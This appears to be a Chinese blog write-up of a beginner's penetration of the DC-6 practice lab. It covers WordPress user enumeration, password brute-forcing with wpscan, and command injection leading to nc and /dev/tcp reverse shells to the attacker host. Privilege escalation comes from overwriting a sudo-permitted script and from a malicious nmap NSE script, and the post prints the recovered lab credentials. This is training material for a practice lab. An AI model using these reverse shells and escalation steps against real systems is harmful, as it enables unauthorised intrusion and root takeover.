新手的第一次DC-6靶场渗透实战过程

新手的第一次DC-6靶场渗透实战过程

一.信息收集

1.靶机探测

nmap -sn 192.168.162.1/24 --exclude 192.168.162.128 192.168.162.1

image-20250226182028953

2.端口扫描

 nmap -sV -sC -O -p- 192.168.162.145 

image-20250226182249838

3.漏洞扫描

nmap --script vuln  192.168.162.145

image-20250226183953357

发现用户:通过http-wordpress-users脚本检测到以下用户名:
admingrahammarksarahjens

4.目录扫描

 dirsearch -u 192.168.162.145 -e* -x 403,402,401,500,502 

image-20250226184958573

http://wordy/wp-login.php发现了一个登录界面

5.网页信息探测

image-20250226190250081

二.暴力破解

1.字典生成

cewl http://wordy/ -w cewl_words.txt

那么我们这里就使用cewl生成字典

image-20250226191146247

2.密码爆破

根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典

img

生成字典后将字典复制到桌面

cat /usr/share/wordlists/rockyou.txt | grep k01 > /root/桌面/passwd.txt

image-20250226193528555

继续使用wpscan进行爆破

wpscan --url http://wordy -P passwd.txt  -U  admin,graham,mark,sarah,jens

image-20250226200054529

mark

helpdesk01

三.漏洞利用

1.反弹shell

在网站的工具下面发现一个任意命令执行漏洞 这个输入框有字数限制我们使用burpsuite进行抓包

image-20250226194622491

抓到包后发送到 repater模块 使用nc命令反弹shell

nc 192.168.162.128 4445	 -e /bin/bash 

image-20250226195208450

在kali上开启监听端口

nc -lvp 4445  
image-20250226195343037

升级成交互shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20250226200134773

2.提权

在/home目录下找到提示

image-20250226200535531

重点在第三项,添加用户graham,密码是GSo7isUM1D4,标记为完成。这可能意味着系统中存在用户graham,密码可能是给定的这个。这是非常重要的,因为如果这个密码是有效的,攻击者可以尝试使用graham的凭证进行登录或权限提升

image-20250226200739873

在这个用户的目录下又给了提示

image-20250226200821831

这句告诉我们jens有着比我们更高权限 我们需要把用户切换到 jens去

使用

sudo -l

image-20250226201452653

这里显示用户graham可以以用户jens的身份无需密码运行/home/jens/backups.sh脚本 以这里为突破口

检查 /home/jens/backups.sh 的权限:

ls -l /home/jens/backups.sh    # 查看文件属主和权限

如果graham有写权限:直接替换脚本为恶意代码:

echo -e '#!/bin/bash\n/bin/bash -i' > /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh   # 获取jens的Shell

image-20250226201718051

成功切换

现在还没有到root再进行提权

使用 sudo -l查看

image-20250226201938746

根据 sudo -l 的输出,用户 jens 可以无需密码以 root 身份运行 /usr/bin/nmap。以这里为突破口提权

3.通过Nmap脚本引擎(NSE)执行命令

1.创建恶意NSE脚本

  1. 在可写目录(如/tmp)创建脚本文件:
   echo 'local os = require "os"
   os.execute("/bin/bash -c '\\''/bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'\\''")' > /tmp/shell.nse

步骤2:执行脚本触发反弹Shell

sudo nmap --script=/tmp/shell.nse

image-20250226203203803

攻击机监听

  nc -lvnp 4444
image-20250226203121939

四.查找flag

find / -name *flag*
image-20250226203352248

成功

image-20250226203417194
posted @ 2025-08-06 11:52  0xMouise  阅读(5)  评论(0)    收藏  举报